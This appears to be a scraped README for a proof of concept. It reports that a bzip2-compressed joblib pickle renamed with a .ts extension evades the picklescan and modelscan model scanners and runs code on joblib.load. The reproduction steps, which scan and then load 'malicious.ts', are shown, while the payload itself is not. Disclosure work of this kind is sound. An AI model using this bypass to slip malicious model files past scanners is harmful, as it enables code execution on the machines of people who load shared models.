Views
No views yet
.ts)
Bypass: picklescan 1.0.4 + modelscan 0.8.8
Modes bypassed: all 4 (direct + directory scan for both scanners)
RCE via: joblib.load('malicious.ts')
Technique: bzip2-compressed joblib payload
Tested: 2026-06-25malicious.ts — bzip2-compressed joblib payload with .ts extensionpoc-ts.py — reproduction scriptREADME.md — this file1pip install picklescan modelscan joblib
2
3python3 poc-ts.py
4
5picklescan -p malicious.ts
6picklescan -p .
7modelscan -p malicious.ts
8modelscan -p .
9
10python3 -c "
11import joblib
12print('--- BEFORE LOAD ---')
13joblib.load('malicious.ts')
14print('--- AFTER LOAD ---')
15"